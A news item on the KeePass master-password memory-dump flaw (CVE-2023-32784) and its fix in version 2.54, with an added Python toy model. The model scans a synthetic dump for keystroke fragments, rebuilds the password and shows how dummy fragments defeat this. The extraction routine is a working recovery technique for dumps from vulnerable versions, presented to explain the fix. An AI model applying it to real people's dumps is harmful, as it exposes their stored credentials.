
Master password-leaking bug addressed by KeePass

SecurityWeek reports that the open source password manager KeePass has released an update for CVE-2023-32784, a vulnerability in KeePass 2.x that allows the cleartext master password to be recovered from a memory dump. A dump of the KeePass process could also be mined for other passwords that had been typed into the application. The security researcher who published a proof-of-concept tool rated the risk as low, because the flaw cannot be exploited remotely: an attacker must already have access to the machine, or to a memory dump taken from it, to make use of it.

The fix ships in KeePass 2.54, which arrived weeks ahead of its originally planned July release. It strengthens process memory protection in two ways: entering the master password no longer creates managed strings that hold the typed characters, and KeePass now creates dummy fragments in memory and mixes them with the genuine ones, so a dump no longer reveals which fragments belong to the real password. The release also brings new features, bug fixes, and user interface and integration improvements.

Note that the update does not change what may already exist on disk: a process or crash dump written while a vulnerable version was running still contains the fragments, so anyone who suspects such a dump exists should change the master password after updating.
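How the recovery works, and why mixing in dummy fragments defeats it, is easier to see with a toy model. The following is an added example written for this page; it is not KeePass code and not the researcher's proof-of-concept tool. It assumes the publicly documented fragment shape for this CVE: every keystroke in the masked master-password box left behind a managed string made of one bullet character (U+2022) per already-typed character followed by the newly typed character, stored as UTF-16LE, which is why the first character never leaves a fragment. The "dump" is built in memory from a constructed sample password, and the dummy fragments are a simplification of the 2.54 mitigation, not its actual layout.

```python
"""Toy model of CVE-2023-32784: recovering a master password from leftover
keystroke fragments in a memory dump, and why dummy fragments defeat it.

Added example for this page, not code from KeePass or the researcher's PoC.
Assumed fragment shape (public CVE description): "\u2022" * n + ch as UTF-16LE,
where ch is the character at 0-based position n of the typed password.
"""
import random
import re
from collections import defaultdict

BULLET = "\u2022".encode("utf-16-le")  # b'\x22\x20', the masking bullet

# One or more bullets, then a printable ASCII char in UTF-16LE (byte, 0x00).
FRAGMENT_RE = re.compile(rb"(?:\x22\x20)+([\x20-\x7e])\x00")


def fragment(position: int, ch: str) -> bytes:
    """Leftover string for the keystroke that put `ch` at `position`."""
    if len(ch) != 1 or not 0x20 <= ord(ch) <= 0x7E:
        raise ValueError("toy model handles printable ASCII only")
    return BULLET * position + ch.encode("utf-16-le")


def build_dump(password: str, dummies=(), seed: int = 7) -> bytes:
    """Constructed 'memory dump' (not a real KeePass dump): one fragment per
    keystroke after the first, shuffled, separated by filler bytes >= 0x80 so
    the filler can neither form nor extend a fragment. `dummies` is a list of
    (position, char) pairs mimicking the 2.54 mitigation."""
    rng = random.Random(seed)
    chunks = [fragment(i, password[i]) for i in range(1, len(password))]
    chunks += [fragment(p, c) for p, c in dummies]
    rng.shuffle(chunks)
    dump = bytearray()
    for chunk in chunks:
        dump += bytes(rng.randrange(0x80, 0x100) for _ in range(rng.randrange(4, 32)))
        dump += chunk
    return bytes(dump)


def extract_candidates(dump: bytes) -> dict:
    """Scan a dump for fragments; map 0-based position -> set of candidate chars."""
    found = defaultdict(set)
    for m in FRAGMENT_RE.finditer(dump):
        n_bullets = (m.end() - m.start() - 2) // 2  # strip the 2-byte char
        found[n_bullets].add(m.group(1).decode("ascii"))
    return dict(found)


def reconstruct(candidates: dict) -> str:
    """Best-effort password: '?' where no or several candidates exist.
    Position 0 never leaves a fragment, so it is always unknown; the length
    is inferred from the highest position seen."""
    if not candidates:
        return ""
    length = max(candidates) + 1
    out = []
    for i in range(length):
        cands = candidates.get(i, set())
        out.append(next(iter(cands)) if len(cands) == 1 else "?")
    return "".join(out)


if __name__ == "__main__":
    SAMPLE = "Tr0ub4dor&3"  # constructed sample password
    clean = extract_candidates(build_dump(SAMPLE))
    print("vulnerable:", reconstruct(clean))  # ?r0ub4dor&3
    # Mitigation idea: a dummy fragment at every position carrying a wrong char.
    dummies = [(i, "x") for i in range(1, len(SAMPLE))]
    mixed = extract_candidates(build_dump(SAMPLE, dummies))
    print("with dummies:", reconstruct(mixed))  # ???????????
```

Against the clean dump, `reconstruct()` returns the sample password with only the first character unknown, which matches the CVE's own statement that the first character cannot be recovered. Once a dummy fragment is mixed in at each position, every position has two candidates and nothing is recoverable. The scanning step is the same thing a real attacker does to a dump file; the 2.54 change removes the genuine fragments at the source and makes whatever does appear indistinguishable from noise.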
